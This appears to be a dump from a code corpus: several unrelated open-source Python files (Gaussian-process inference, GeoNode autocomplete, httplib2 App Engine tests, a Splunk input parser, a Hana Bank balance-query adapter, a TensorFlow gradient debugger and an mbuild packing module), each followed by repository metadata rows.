(K, dKs) = k(self.x, self.x, gradient=True)
else:
mu = m(self.x)
K = k(self.x, self.x)
dmus = []
dKs = []
mu = mu[0]
K = K[0]
# Log pdf
if self.observed:
f0 = self.f - mu
#print('hereiam')
#print(K)
try:
U = chol(K)
except linalg.LinAlgError:
print('non positive definite, return -inf')
return -np.inf
z = chol_solve(U, f0)
#print(K)
L = gaussian_logpdf(np.dot(f0, z),
0,
0,
logdet_chol(U),
np.size(self.f))
for (dmu, func) in dmus:
# Derivative w.r.t. mean vector
d = -np.sum(z)
# Send the derivative message
func += d
#func(d)
for (dK, func) in dKs:
# Compute derivative w.r.t. covariance matrix
d = 0.5 * (np.dot(z, np.dot(dK, z))
- np.trace(chol_solve(U, dK)))
# Send the derivative message
#print('add gradient')
#func += d
func(d)
else:
raise Exception('Not implemented yet')
return L
## Let f1 be observed and f2 latent function values.
# Compute <log p(f1,f2|m,k)>
#L = gaussian_logpdf(sum_product(np.outer(self.f,self.f) + self.Cov,
# Compute <log q(f2)>
def update(self):
# Messages from parents
m = self.parents[0].message_to_child()
k = self.parents[1].message_to_child()
## m = self.parents[0].message_to_child()[0]
## k = self.parents[1].message_to_child()[0]
if self.observed:
# Observations of this node
self.u = gp_posterior_moment_function(m, k, self.x, self.f)
else:
x = np.array([])
y = np.array([])
# Messages from children
for (child,index) in self.children:
(msg, mask) = child.message_to_parent(index)
# Ignoring masks and plates..
# m[0] is the inputs
x = np.concatenate((x, msg[0]), axis=-2)
# m[1] is the observations
y = np.concatenate((y, msg[1]))
# m[2] is the covariance matrix
V = linalg.block_diag(V, msg[2])
self.u = gp_posterior_moment_function(m, k, x, y, covariance=V)
self.x = x
self.f = y
| mit | -8,059,095,777,191,274,000 | 27.401212 | 95 | 0.466092 | false |
travislbrundage/geonode | geonode/people/autocomplete_light_registry.py | 11 | 1333 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import autocomplete_light
from .models import Profile
class ProfileAutocomplete(autocomplete_light.AutocompleteModelTemplate):
choice_template = 'autocomplete_response.html'
def choices_for_request(self):
self.choices = self.choices.exclude(username='AnonymousUser')
return super(ProfileAutocomplete, self).choices_for_request()
autocomplete_light.register(
Profile,
ProfileAutocomplete,
search_fields=['first_name', 'last_name', 'email', 'username'],
)
| gpl-3.0 | 3,028,582,444,827,986,400 | 35.027027 | 73 | 0.662416 | false |
smurfix/httplib2 | python2/httplib2test_appengine.py | 7 | 2188 | """Tests for httplib2 on Google App Engine."""
import mock
import os
import sys
import unittest
APP_ENGINE_PATH='/usr/local/google_appengine'
sys.path.insert(0, APP_ENGINE_PATH)
import dev_appserver
dev_appserver.fix_sys_path()
from google.appengine.ext import testbed
# Ensure that we are not loading the httplib2 version included in the Google
# App Engine SDK.
sys.path.insert(0, os.path.dirname(os.path.realpath(__file__)))
class AberrationsTest(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_urlfetch_stub()
def tearDown(self):
self.testbed.deactivate()
@mock.patch.dict('os.environ', {'SERVER_SOFTWARE': ''})
def testConnectionInit(self):
global httplib2
import httplib2
self.assertNotEqual(
httplib2.SCHEME_TO_CONNECTION['https'], httplib2.AppEngineHttpsConnection)
self.assertNotEqual(
httplib2.SCHEME_TO_CONNECTION['http'], httplib2.AppEngineHttpConnection)
del globals()['httplib2']
class AppEngineHttpTest(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_urlfetch_stub()
global httplib2
import httplib2
reload(httplib2)
def tearDown(self):
self.testbed.deactivate()
del globals()['httplib2']
def testConnectionInit(self):
self.assertEqual(
httplib2.SCHEME_TO_CONNECTION['https'], httplib2.AppEngineHttpsConnection)
self.assertEqual(
httplib2.SCHEME_TO_CONNECTION['http'], httplib2.AppEngineHttpConnection)
def testGet(self):
http = httplib2.Http()
response, content = http.request("http://www.google.com")
self.assertEqual(httplib2.SCHEME_TO_CONNECTION['https'],
httplib2.AppEngineHttpsConnection)
self.assertEquals(1, len(http.connections))
self.assertEquals(response.status, 200)
self.assertEquals(response['status'], '200')
def testProxyInfoIgnored(self):
http = httplib2.Http(proxy_info=mock.MagicMock())
response, content = http.request("http://www.google.com")
self.assertEquals(response.status, 200)
if __name__ == '__main__':
unittest.main()
| mit | -5,151,024,276,451,210,000 | 26.696203 | 80 | 0.713894 | false |
chenziliang/google | Splunk_TA_google/bin/splunktalib/modinput.py | 1 | 4669 | import sys
import subprocess
import traceback
from splunktalib.common import log
import splunktalib.splunk_platform as sp
logger = log.Logs().get_logger("util")
def _parse_modinput_configs(root, outer_block, inner_block):
"""
When user splunkd spawns modinput script to do config check or run
<?xml version="1.0" encoding="UTF-8"?>
<input>
<server_host>localhost.localdomain</server_host>
<server_uri>https://127.0.0.1:8089</server_uri>
<session_key>xxxyyyzzz</session_key>
<checkpoint_dir>ckpt_dir</checkpoint_dir>
<configuration>
<stanza name="snow://alm_asset">
<param name="duration">60</param>
<param name="host">localhost.localdomain</param>
<param name="index">snow</param>
<param name="priority">10</param>
</stanza>
...
</configuration>
</input>
When user create an stanza through data input on WebUI
<?xml version="1.0" encoding="UTF-8"?>
<items>
<server_host>localhost.localdomain</server_host>
<server_uri>https://127.0.0.1:8089</server_uri>
<session_key>xxxyyyzzz</session_key>
<checkpoint_dir>ckpt_dir</checkpoint_dir>
<item name="abc">
<param name="duration">60</param>
<param name="exclude"></param>
<param name="host">localhost.localdomain</param>
<param name="index">snow</param>
<param name="priority">10</param>
</item>
</items>
"""
confs = root.getElementsByTagName(outer_block)
if not confs:
logger.error("Invalid config, missing %s section", outer_block)
raise Exception("Invalid config, missing %s section".format(
outer_block
))
configs = []
stanzas = confs[0].getElementsByTagName(inner_block)
for stanza in stanzas:
config = {}
stanza_name = stanza.getAttribute("name")
if not stanza_name:
logger.error("Invalid config, missing name")
raise Exception("Invalid config, missing name")
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
name = param.getAttribute("name")
if (name and param.firstChild and
param.firstChild.nodeType == param.firstChild.TEXT_NODE):
config[name] = param.firstChild.data
configs.append(config)
return configs
def parse_modinput_configs(config_str):
"""
@config_str: modinput XML configuration feed by splunkd
@return: meta_config and stanza_config
"""
import xml.dom.minidom as xdm
meta_configs = {
"server_host": None,
"server_uri": None,
"session_key": None,
"checkpoint_dir": None,
}
root = xdm.parseString(config_str)
doc = root.documentElement
for tag in meta_configs.iterkeys():
nodes = doc.getElementsByTagName(tag)
if not nodes:
logger.error("Invalid config, missing %s section", tag)
raise Exception("Invalid config, missing %s section", tag)
if (nodes[0].firstChild and
nodes[0].firstChild.nodeType == nodes[0].TEXT_NODE):
meta_configs[tag] = nodes[0].firstChild.data
else:
logger.error("Invalid config, expect text ndoe")
raise Exception("Invalid config, expect text ndoe")
if doc.nodeName == "input":
configs = _parse_modinput_configs(doc, "configuration", "stanza")
else:
configs = _parse_modinput_configs(root, "items", "item")
return meta_configs, configs
def get_modinput_configs_from_cli(modinput, modinput_stanza=None):
"""
@modinput: modinput name
@modinput_stanza: modinput stanza name, for multiple instance only
"""
assert modinput
splunkbin = sp.get_splunk_bin()
cli = [splunkbin, "cmd", "splunkd", "print-modinput-config", modinput]
if modinput_stanza:
cli.append(modinput_stanza)
out, err = subprocess.Popen(cli, stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
if err:
logger.error("Failed to get modinput configs with error: %s", err)
return None, None
else:
return parse_modinput_configs(out)
def get_modinput_config_str_from_stdin():
"""
Get modinput from stdin which is feed by splunkd
"""
try:
return sys.stdin.read()
except Exception:
logger.error(traceback.format_exc())
raise
def get_modinput_configs_from_stdin():
config_str = get_modinput_config_str_from_stdin()
return parse_modinput_configs(config_str)
| mit | -5,073,781,968,028,439,000 | 30.126667 | 77 | 0.620904 | false |
ssut/PushBank | adapters/hana.py | 1 | 2918 | # -*- coding: utf-8 -*-
import json
import urllib
import urllib2
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
en_name = 'hana'
name = u'하나은행'
def query(account, password, resident):
"""
하나은행 계좌 잔액 빠른조회. 빠른조회 서비스에 등록이 되어있어야 사용 가능.
빠른조회 서비스:
https://open.hanabank.com/flex/quick/quickService.do?oid=quickservice
account -- 계좌번호 ('-' 제외)
password -- 계좌 비밀번호 (숫자 4자리)
resident -- 주민등록번호 앞 6자리
"""
if len(password) != 4 or not password.isdigit():
raise ValueError("password: 비밀번호는 숫자 4자리여야 합니다.")
if len(resident) != 6 or not resident.isdigit():
raise ValueError("resident: 주민등록번호 앞 6자리를 입력해주세요.")
url = 'https://open.hanabank.com/quick_service/inquiryAcct02_01.do'
params = {
'ajax': 'true',
'acctNo': account,
'acctPw': password,
'bkfgResRegNo': resident,
'curCd': '',
'inqStrDt': (datetime.now() - timedelta(days=7)).strftime('%Y%m%d'),
'inqEndDt': datetime.now().strftime('%Y%m%d'),
'rvSeqInqYn': 'Y',
'rcvWdrwDvCd': '',
'rqstNcnt': '30',
'maxRowCount': '700',
'rqstPage': '1',
'acctType': '01',
'language': 'KOR'
}
try:
data = urllib.urlencode(params)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req, timeout=10)
data = response.read()
data = data.decode('euc-kr').encode('utf-8')
success = True
except Exception, e:
if e.getcode() == 500:
success = False
data = e.read()
d = {
'success': success,
'account': account,
}
if success:
data = data.replace(' ', '')
data = BeautifulSoup(data)
balance = data.select('table.tbl_col01' +
' tr:nth-of-type(2) td')[0].text.strip()
balance = int(balance.replace(',', ''))
history = [
[y.text.strip() for y in x.select('td')]
for x in data.select('table.tbl_col01')[1].select('tbody tr')
]
'''
순서:
거래일, 구분, 적요, 입금액, 출금액, 잔액, 거래시간, 거래점
'''
d['balance'] = balance
d['history'] = [{
'date': datetime.strptime('{0},{1}'.format(x[0], x[6]),
'%Y-%m-%d,%H:%M').date(),
'type': x[1],
'depositor': x[2],
'withdraw': int(x[3].replace(',', '') if x[3] else '0'),
'pay': int(x[4].replace(',', '') if x[4] else '0'),
'balance': int(x[5].replace(',', '')),
'distributor': x[7],
} for x in history]
return d
| mit | 6,866,556,140,860,453,000 | 28.711111 | 76 | 0.504862 | false |
horance-liu/tensorflow | tensorflow/python/debug/lib/debug_gradients.py | 25 | 15201 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow Debugger: Tools for debugging gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import uuid
import six
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_graphs
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import variables
_GRADIENT_DEBUG_TAG = "gradient_debug_"
_gradient_debuggers = {}
def _tensor_to_grad_debug_op_name(tensor, grad_debugger_uuid):
op_name, slot = debug_graphs.parse_node_or_tensor_name(tensor.name)
return "%s_%d/%s%s" % (op_name, slot, _GRADIENT_DEBUG_TAG, grad_debugger_uuid)
def _parse_grad_debug_op_name(op_name):
"""Parse the name of a debug gradient op.
Args:
op_name: the name of the debug gradient op.
Returns:
1) The UUID of the GradientsDebugger that created the debug gradient op.
2) Name of the original tensor whose gradient is debugged by the debug
gradient op.
"""
name_items = op_name.split("/")
assert len(name_items) > 1
assert name_items[-1].startswith(_GRADIENT_DEBUG_TAG)
grad_debugger_uuid = name_items[-1][len(_GRADIENT_DEBUG_TAG):]
if "_" in grad_debugger_uuid:
grad_debugger_uuid = grad_debugger_uuid[:grad_debugger_uuid.index("_")]
orig_tensor_slot = int(name_items[-2][name_items[-2].rfind("_") + 1:])
orig_base_op_name = name_items[-2][:name_items[-2].rfind("_")]
orig_tensor_name = ("/".join(name_items[:-2] + [orig_base_op_name]) +
":%d" % orig_tensor_slot)
return grad_debugger_uuid, orig_tensor_name
class GradientsDebugger(object):
"""Gradients Debugger.
Allows retrieval of gradient tensors created by TensorFlow's automatic
differentiation algorithm, i.e., @{tf.gradients} and optimizer classes that
use it.
"""
# TODO(cais): Add examples code in the doc string?
def __init__(self, y_tensor=None):
"""Constructor of GradientsDebugger.
Args:
y_tensor: optional: the `tf.Tensor` to be differentiated, i.e., the tensor
on the numerator of the differentiation.
"""
self._uuid = uuid.uuid4().hex
_gradient_debuggers[self._uuid] = self
# A dict mapping x-tensor names to gradient tensor. x-tensor refers to the
# independent tf.Tensor, i.e., the tensor on the denominator of the
# differentiation.
self._gradient_tensors = {}
self._y_tensor = y_tensor
self._graph = None
if y_tensor:
self._graph = y_tensor.graph
self._is_active_context = False
@property
def y_tensor(self):
return self._y_tensor
@property
def graph(self):
return self._graph
def __enter__(self):
self._is_active_context = True
def __exit__(self, unused_type, unused_value, unused_traceback):
self._is_active_context = False
def identify_gradient(self, input_tensor):
"""Create a debug identity tensor that registers and forwards gradients.
The side effect of this method is that when gradient tensor(s) are created
with respect to the any paths that include the `input_tensor`, the gradient
tensor(s) with repsect to `input_tensor` will be registered with this
this `GradientsDebugger` instance and can later be retrieved, with the
methods `gradient_tensor` and `gradient_tensors`.
Example:
```python
x = tf.Variable(1.0)
y = tf.add(x, x)
grad_debugger = tf_debug.GradientsDebugger()
debug_y = grad_debugger.identify_gradient(y)
z = tf.square(debug_y)
# Create a train op under the grad_debugger context.
with grad_debugger:
train_op = tf.train.GradientDescentOptimizer(z)
# Now we can reflect through grad_debugger to get the gradient tensor
# with respect to y.
y_grad = grad_debugger.gradient_tensor(y)
```
Args:
input_tensor: the input `tf.Tensor` object whose related gradient tensors
are to be reigstered with this `GradientsDebugger` instance when they
are created, e.g., during @{tf.gradients} calls or the construction
of optimization (training) op that uses @{tf.gradients}.
Returns:
A forwarded identity of `input_tensor`, as a `tf.Tensor`.
Raises:
ValueError: If an op with name that duplicates the gradient-debugging op
already exists in the graph (highly unlikely).
"""
# TODO(cais): Allow overriding gradient.
# TODO(cais): Implement value_stack.
grad_debug_op_name = _tensor_to_grad_debug_op_name(input_tensor, self._uuid)
# pylint: disable=protected-access
debug_grad_identity = gen_array_ops._debug_gradient_identity(
input_tensor, name=grad_debug_op_name)
# pylint: enable=protected-access
if debug_grad_identity.op.name != grad_debug_op_name:
raise ValueError(
"The graph already contains an op named %s" % grad_debug_op_name)
return debug_grad_identity
def watch_gradients_by_tensors(self, graph, tensors):
"""Watch gradient tensors by x-tensor(s).
The side effect of this method is that when gradient tensor(s) are created
with respect to the any paths that include the `x_tensor`s, the gradient
tensor(s) with repsect to the tensor will be registered with this
this `GradientsDebugger` instance and can later be retrieved, with the
methods `gradient_tensor` and `gradient_tensors`.
Unlike the method `identify_gradient`, this method is used to retrieve
gradient tensors after the construction of the forward subgraph has
completed (but before the construction of the backward subgraph).
This method is the same as `watch_gradients_by_x_tensor_names` except that
the tensors are specified by the Python `tf.Tensor` or `tf.Variable`
objects, instead by name patterns.
Example:
```python
x = tf.Variable(1.0)
y = tf.add(x, x, name="y")
z = tf.square(debug_y)
# Create a train op under the grad_debugger context.
grad_debugger = tf_debug.GradientsDebugger()
with grad_debugger.watch_gradients_by_tensors(y):
train_op = tf.train.GradientDescentOptimizer(z)
# Now we can reflect through grad_debugger to get the gradient tensor
# with respect to y.
y_grad = grad_debugger.gradient_tensor(y)
# or
y_grad = grad_debugger.gradient_tensor("y:0")
```
Args:
graph: the `tf.Graph` to watch the gradients on.
tensors: a `tf.Tensor` or `tf.Variable` object, or a list of such objects.
Returns:
The GradientsDebugger instance itself.
"""
if not isinstance(tensors, list):
tensors = [tensors]
tensor_name_regex = []
for tensor in tensors:
tensor_name_regex.append(re.escape(tensor.name) + "$")
tensor_name_regex = "(" + "|".join(tensor_name_regex) + ")"
return self.watch_gradients_by_tensor_names(graph, tensor_name_regex)
def watch_gradients_by_tensor_names(self, graph, tensor_name_regex):
"""Watch gradient tensors by name(s) of the x-tensor(s).
The side effect of this method is that when gradient tensor(s) are created
with respect to the x-tensors, the gradient tensor(s) will be registered
with this `GradientsDebugger` instance and can later be retrieved.
Unlike the `identify_gradient` method, this method is used after the
construction of the forward graph has completed. Unlike the
`watch_gradients_by_tensor` method, this method does not use handles to the
tensors of interest; it uses their names.
This method is the same as `watch_gradients_by_tensors` except that the
x-tensors are specified by name patterns, instead of `tf.Tensor` or
`tf.Variable` objects.
Example:
```python
x = tf.Variable(1.0, name="x")
y = tf.add(x, x, name="y")
z = tf.square(debug_y)
# Create a train op under the grad_debugger context.
grad_debugger = tf_debug.GradientsDebugger()
with grad_debugger.watch_gradients_by_tensor_names(r"(x|y):0$"):
train_op = tf.train.GradientDescentOptimizer(z)
# Now we can reflect through grad_debugger to get the gradient tensor
# with respect to x and y.
x_grad = grad_debugger.gradient_tensor("x:0")
y_grad = grad_debugger.gradient_tensor("y:0")
```
Args:
graph: the `tf.Graph` to watch the gradients on.
tensor_name_regex: the regular-expression pattern of the name(s) of the
x-tensor(s) to watch. x-tensor refers to the tensors on the denominator
of the differentiation.
Returns:
The GradientsDebugger instance itself.
"""
tensor_name_pattern = re.compile(tensor_name_regex)
# pylint: disable=protected-access
with graph.as_default():
for op in graph.get_operations():
for output in op.outputs:
if tensor_name_pattern.match(output.name):
debug_op = self.identify_gradient(output)
for consumer in output.consumers():
if consumer == debug_op.op:
continue
# Locate the slot index of the original input.
input_slots = []
for i, consumer_input in enumerate(consumer._inputs):
if consumer_input == output:
input_slots.append(i)
for slot in input_slots:
consumer._inputs[slot] = debug_op
debug_op._consumers.append(consumer)
del output._consumers[:]
output._consumers.append(debug_op.op)
# pylint: enable=protected-access
return self
def _check_same_graph(self, tensor):
if self._graph is None:
self._graph = tensor.graph
elif self._graph != tensor.graph:
raise ValueError(
"The graph of the value (%s) is not the same as the graph %s" %
(tensor.graph, self._graph))
def register_gradient_tensor(self,
x_tensor_name,
gradient_tensor):
"""Register the gradient tensor for an x-tensor.
Args:
x_tensor_name: (`str`) the name of the independent `tf.Tensor`, i.e.,
the tensor on the denominator of the differentiation.
gradient_tensor: the gradient `tf.Tensor`.
"""
if len(_gradient_debuggers) == 1 or self._is_active_context:
self._check_same_graph(gradient_tensor)
self._gradient_tensors[x_tensor_name] = gradient_tensor
def gradient_tensor(self, x_tensor):
"""Get the gradient tensor of an x-tensor.
Args:
x_tensor: (`tf.Tensor`, `tf.Variable` or `str`) The x-tensor object or its
name. x-tensor refers to the independent `tf.Tensor`, i.e., the tensor
on the denominator of the differentiation.
Returns:
If found, the gradient tensor.
Raises:
TypeError: If `x_tensor` is not a `tf.Tensor`, `tf.Variable` or `str`.
LookupError: If the `x_tensor` has not been registered with a gradient
tensor.
"""
x_tensor_name = self._get_tensor_name(x_tensor)
if x_tensor_name not in self._gradient_tensors:
raise LookupError(
"This GradientsDebugger has not received any gradient tensor for "
"x-tensor %s" % x_tensor_name)
return self._gradient_tensors[x_tensor_name]
def gradient_tensors(self):
"""Get the gradient tensors that this object is aware of.
Returns:
A dict mapping x-tensor names to gradient tensor objects. x-tensor refers
to the tensors on the denominator of the differentation.
"""
return self._gradient_tensors
def _get_tensor_name(self, tensor):
if isinstance(tensor, (ops.Tensor, variables.Variable)):
return tensor.name
elif isinstance(tensor, six.string_types):
return tensor
else:
raise TypeError(
"x_tensor must be a str or tf.Tensor or tf.Variable, "
"but instead has type %s" % type(tensor))
def clear_gradient_debuggers():
"""Clear all globally registered gradient debuggers."""
_gradient_debuggers.clear()
@ops.RegisterGradient("DebugGradientIdentity")
def _identify_gradient_grad(op, dy):
"""Gradient function for the DebugIdentity op."""
# TODO(cais): Allow overriding gradient.
grad_debugger_uuid, orig_tensor_name = _parse_grad_debug_op_name(op.name)
grad_debugger = _gradient_debuggers[grad_debugger_uuid]
grad_debugger.register_gradient_tensor(orig_tensor_name, dy)
return dy
def gradient_values_from_dump(grad_debugger, x_tensor, dump):
"""Find gradient values from a `DebugDumpDir` object.
Args:
grad_debugger: the `tf_debug.GradientsDebugger` instance to be used.
x_tensor: (`tf.Tensor`, `tf.Variable` or `str`) The x-tensor object or its
name. x-tensor refers to the independent `tf.Tensor`, i.e., the tensor
on the denominator of the differentiation.
dump: A `tfdbg.DebugDumpDir` object.
Returns:
If this `GradientsDebugger` instance has the gradient tensor of `x_tensor`
registered: a list of `numpy.ndarray` representing the value of the
gradient tensor from `dump`. The list could be empty, if the gradient
tensor is not executed in the `tf.Session.run()` call that generated
the `dump`. The list could also contain multiple values of the gradient
tensor, e.g., if gradient tensor is computed repeatedly in a
`tf.while_loop` during the run that generated the `dump`.
Raises:
LookupError: If this `GradientsDebugger` instance does not have the
gradient tensor of `x_tensor` registered.
ValueError: If this `GradientsDebugger` has a `tf.Graph` object that
does not match the `tf.Graph` object of the `dump`.
TypeError: If `x_tensor` is not a `tf.Tensor`, `tf.Variable` or `str`.
"""
# TODO(cais): Use this method in LocalCLIDebugWrapperSession to present the
# gradient tensors to the TFDBG CLI.
# If possible, verify that the Python graph of the dump and that of this
# GradientsDebugger match.
if (dump.python_graph and grad_debugger.graph and
dump.python_graph != grad_debugger.graph):
raise ValueError(
"This GradientsDebugger instance has a graph (%s) that differs from "
"the graph of the DebugDumpDir object (%s)." %
(grad_debugger.graph, dump.python_graph))
gradient_tensor = grad_debugger.gradient_tensor(x_tensor)
node_name, output_slot = debug_graphs.parse_node_or_tensor_name(
gradient_tensor.name)
try:
return dump.get_tensors(node_name, output_slot, "DebugIdentity")
except debug_data.WatchKeyDoesNotExistInDebugDumpDirError:
return []
| apache-2.0 | -7,737,249,932,943,252,000 | 35.453237 | 80 | 0.676469 | false |
mutability/mlat-client | mlat/client/options.py | 1 | 6636 | #!/usr/bin/env python3
# -*- mode: python; indent-tabs-mode: nil -*-
# Part of mlat-client - an ADS-B multilateration client.
# Copyright 2015, Oliver Jowett <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import functools
import _modes
from mlat.client.receiver import ReceiverConnection
from mlat.client.output import OutputListener, OutputConnector
from mlat.client.output import BasestationConnection, ExtBasestationConnection, BeastConnection
from mlat.client.util import log
_receiver_types = {
# input type -> decoder mode, server clock type
# the server clock type is used by the server to set
# the clock jitter etc; clock frequency and
# epoch are provided by the client.
'auto': (None, 'unknown'),
'dump1090': (_modes.BEAST, 'dump1090'),
'beast': (_modes.BEAST, 'beast'),
'radarcape_12mhz': (_modes.BEAST, 'radarcape_12mhz'), # compat
'radarcape_gps': (_modes.RADARCAPE, 'radarcape_gps'), # compat
'radarcape': (_modes.BEAST, 'radarcape'), # autodetects gps if present
'sbs': (_modes.SBS, 'sbs'),
'avrmlat': (_modes.AVRMLAT, 'unknown'),
}
def latitude(s):
lat = float(s)
if lat < -90 or lat > 90:
raise argparse.ArgumentTypeError('Latitude %s must be in the range -90 to 90' % s)
return lat
def longitude(s):
lon = float(s)
if lon < -180 or lon > 360:
raise argparse.ArgumentTypeError('Longitude %s must be in the range -180 to 360' % s)
if lon > 180:
lon -= 360
return lon
def altitude(s):
if s.endswith('m'):
alt = float(s[:-1])
elif s.endswith('ft'):
alt = float(s[:-2]) * 0.3048
else:
alt = float(s)
# Wikipedia to the rescue!
# "The lowest point on dry land is the shore of the Dead Sea [...]
# 418m below sea level". Perhaps not the best spot for a receiver?
# La Rinconada, Peru, pop. 30,000, is at 5100m.
if alt < -420 or alt > 5100:
raise argparse.ArgumentTypeError('Altitude %s must be in the range -420m to 6000m' % s)
return alt
def port(s):
port = int(s)
if port < 1 or port > 65535:
raise argparse.ArgumentTypeError('Port %s must be in the range 1 to 65535' % s)
return port
def hostport(s):
parts = s.split(':')
if len(parts) != 2:
raise argparse.ArgumentTypeError("{} should be in 'host:port' format".format(s))
return (parts[0], int(parts[1]))
def make_inputs_group(parser):
inputs = parser.add_argument_group('Mode S receiver input connection')
inputs.add_argument('--input-type',
help="Sets the input receiver type.",
choices=_receiver_types.keys(),
default='dump1090')
inputs.add_argument('--input-connect',
help="host:port to connect to for Mode S traffic. Required.",
required=True,
type=hostport,
default=('localhost', 30005))
def clock_frequency(args):
return _modes.Reader(_receiver_types[args.input_type][0]).frequency
def clock_epoch(args):
return _modes.Reader(_receiver_types[args.input_type][0]).epoch
def clock_type(args):
return _receiver_types[args.input_type][1]
def connection_mode(args):
return _receiver_types[args.input_type][0]
def make_results_group(parser):
results = parser.add_argument_group('Results output')
results.add_argument('--results',
help="""
<protocol>,connect,host:port or <protocol>,listen,port.
Protocol may be 'basestation', 'ext_basestation', or 'beast'. Can be specified multiple times.""",
action='append',
default=[])
results.add_argument("--no-anon-results",
help="Do not generate results for anonymized aircraft",
action='store_false',
dest='allow_anon_results',
default=True)
results.add_argument("--no-modeac-results",
help="Do not generate results for Mode A/C tracks",
action='store_false',
dest='allow_modeac_results',
default=True)
return results
def output_factory(s):
parts = s.split(',')
if len(parts) != 3:
raise ValueError('exactly three comma-separated values are needed (see help)')
ctype, cmode, addr = parts
connections = {
'basestation': BasestationConnection,
'ext_basestation': ExtBasestationConnection,
'beast': BeastConnection
}
c = connections.get(ctype)
if c is None:
raise ValueError("connection type '{0}' is not supported; options are: '{1}'".format(
ctype, "','".join(connections.keys())))
if cmode == 'listen':
return functools.partial(OutputListener, port=int(addr), connection_factory=c)
elif cmode == 'connect':
return functools.partial(OutputConnector, addr=hostport(addr), connection_factory=c)
else:
raise ValueError("connection mode '{0}' is not supported; options are: 'connect','listen'".format(cmode))
def build_outputs(args):
outputs = []
for s in args.results:
try:
factory = output_factory(s)
except ValueError as e:
log("Warning: Ignoring bad results output option '{0}': {1}",
s, str(e))
continue
try:
output = factory()
except Exception as e:
log("Warning: Could not create results output '{0}': {1}",
s, str(e))
continue
outputs.append(output)
return outputs
def build_receiver_connection(args):
return ReceiverConnection(host=args.input_connect[0],
port=args.input_connect[1],
mode=connection_mode(args))
| gpl-3.0 | 2,082,988,202,807,016,700 | 33.030769 | 113 | 0.604581 | false |
tcmoore3/mbuild | mbuild/packing.py | 1 | 14323 | from __future__ import division
import sys
import os
import tempfile
import warnings
from distutils.spawn import find_executable
from subprocess import Popen, PIPE
import numpy as np
from mbuild.compound import Compound
from mbuild.exceptions import MBuildError
from mbuild.box import Box
from mbuild import clone
__all__ = ['fill_box', 'fill_region', 'solvate']
PACKMOL = find_executable('packmol')
PACKMOL_HEADER = """
tolerance {0:.16f}
filetype pdb
output {1}
seed {2}
"""
PACKMOL_SOLUTE = """
structure {0}
number 1
center
fixed {1:.3f} {2:.3f} {3:.3f} 0. 0. 0.
end structure
"""
PACKMOL_BOX = """
structure {0}
number {1:d}
inside box {2:.3f} {3:.3f} {4:.3f} {5:.3f} {6:.3f} {7:.3f}
end structure
"""
def fill_box(compound, n_compounds=None, box=None, density=None, overlap=0.2,
seed=12345, edge=0.2, compound_ratio=None,
aspect_ratio=None, temp_file=None):
"""Fill a box with a compound using packmol.
Two arguments of `n_compounds, box, and density` must be specified.
If `n_compounds` and `box` are not None, the specified number of
n_compounds will be inserted into a box of the specified size.
If `n_compounds` and `density` are not None, the corresponding box
size will be calculated internally. In this case, `n_compounds`
must be an int and not a list of int.
If `box` and `density` are not None, the corresponding number of
compounds will be calculated internally.
For the cases in which `box` is not specified but generated internally,
the default behavior is to calculate a cubic box. Optionally,
`aspect_ratio` can be passed to generate a non-cubic box.
Parameters
----------
compound : mb.Compound or list of mb.Compound
Compound or list of compounds to be put in box.
n_compounds : int or list of int
Number of compounds to be put in box.
box : mb.Box
Box to be filled by compounds.
density : float, units kg/m^3, default=None
Target density for the system in macroscale units. If not None, one of
`n_compounds` or `box`, but not both, must be specified.
overlap : float, units nm, default=0.2
Minimum separation between atoms of different molecules.
seed : int, default=12345
Random seed to be passed to PACKMOL.
edge : float, units nm, default=0.2
Buffer at the edge of the box to not place molecules. This is necessary
in some systems because PACKMOL does not account for periodic boundary
conditions in its optimization.
compound_ratio : list, default=None
Ratio of number of each compound to be put in box. Only used in the
case of `density` and `box` having been specified, `n_compounds` not
specified, and more than one `compound`.
aspect_ratio : list of float
If a non-cubic box is desired, the ratio of box lengths in the x, y,
and z directions.
temp_file : str, default=None
File name to write PACKMOL's raw output to.
Returns
-------
filled : mb.Compound
"""
_check_packmol(PACKMOL)
arg_count = 3 - [n_compounds, box, density].count(None)
if arg_count != 2:
msg = ("Exactly 2 of `n_compounds`, `box`, and `density` "
"must be specified. {} were given.".format(arg_count))
raise ValueError(msg)
if box is not None:
box = _validate_box(box)
if not isinstance(compound, (list, set)):
compound = [compound]
if n_compounds is not None and not isinstance(n_compounds, (list, set)):
n_compounds = [n_compounds]
if compound is not None and n_compounds is not None:
if len(compound) != len(n_compounds):
